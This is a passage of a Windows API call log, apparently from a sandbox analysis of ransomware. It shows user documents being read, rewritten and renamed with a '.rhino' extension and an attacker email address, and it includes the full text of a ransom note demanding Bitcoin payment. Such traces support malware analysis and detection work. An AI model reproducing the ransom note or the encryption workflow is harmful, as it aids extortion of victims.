lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.235] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x85b3) returned 0x23f16b8 [0107.236] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.236] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.236] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.236] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.236] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.236] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f58 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.237] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712290 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23f9c78 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f9c78 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b32b8 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b47f8 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b67c0 [0107.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b47f8 | out: hHeap=0x6d0000) returned 1 [0107.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23ff070 [0107.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b67c0 | out: hHeap=0x6d0000) returned 1 [0107.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b32b8 [0107.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23ff070 [0107.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.240] WriteFile (in: hFile=0x294, lpBuffer=0x23ff080*, nNumberOfBytesToWrite=0x86b0, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23ff080*, lpNumberOfBytesWritten=0x292f304*=0x86b0, lpOverlapped=0x0) returned 1 [0107.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.240] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x86b0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.240] CloseHandle (hObject=0x294) returned 1 [0107.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7148e0 [0107.241] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.242] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\di02.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\di02.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\di02.rtf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\di02.rtf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9e30 | out: hHeap=0x6d0000) returned 1 [0107.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9e30 [0107.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x712898 [0107.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9e30 | out: hHeap=0x6d0000) returned 1 [0107.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\q9PBr.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\q9pbr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.244] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x683a [0107.244] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x695a, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.244] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.245] ReadFile (in: hFile=0x294, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.246] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.246] ReadFile (in: hFile=0x294, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x683a, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x683a, lpOverlapped=0x0) returned 1 [0107.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.246] GetLastError () returned 0x0 [0107.246] SetLastError (dwErrCode=0x0) [0107.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x685d) returned 0x23b32b8 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.247] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0107.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f58 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712290 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b9b20 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b9b20 | out: hHeap=0x6d0000) returned 1 [0107.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23f16b8 [0107.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23f2bf8 [0107.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23f4bc0 [0107.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f2bf8 | out: hHeap=0x6d0000) returned 1 [0107.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23ff070 [0107.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f4bc0 | out: hHeap=0x6d0000) returned 1 [0107.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23f16b8 [0107.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.250] WriteFile (in: hFile=0x294, lpBuffer=0x23f16c0*, nNumberOfBytesToWrite=0x695a, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23f16c0*, lpNumberOfBytesWritten=0x292f304*=0x695a, lpOverlapped=0x0) returned 1 [0107.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.250] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x695a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.250] CloseHandle (hObject=0x294) returned 1 [0107.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9e30 [0107.252] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7148e0 [0107.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9e30 | out: hHeap=0x6d0000) returned 1 [0107.252] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\q9PBr.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\q9pbr.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\q9PBr.odp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\q9pbr.odp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9ee8 | out: hHeap=0x6d0000) returned 1 [0107.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3c38 [0107.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712898 [0107.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3c38 | out: hHeap=0x6d0000) returned 1 [0107.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.254] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0107.254] WriteFile (in: hFile=0x294, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0107.256] CloseHandle (hObject=0x294) returned 1 [0107.256] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ttIR1y8rGjuXrKO.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\ttir1y8rgjuxrko.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.256] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xfda2 [0107.256] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xfec2, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.256] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.257] ReadFile (in: hFile=0x294, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.258] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.258] ReadFile (in: hFile=0x294, lpBuffer=0x2b80040, nNumberOfBytesToRead=0xfda2, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0xfda2, lpOverlapped=0x0) returned 1 [0107.259] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.259] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.259] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.259] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.259] GetLastError () returned 0x0 [0107.259] SetLastError (dwErrCode=0x0) [0107.259] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.259] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xfdc5) returned 0x23ff070 [0107.261] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.261] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.261] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.261] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.261] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f58 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 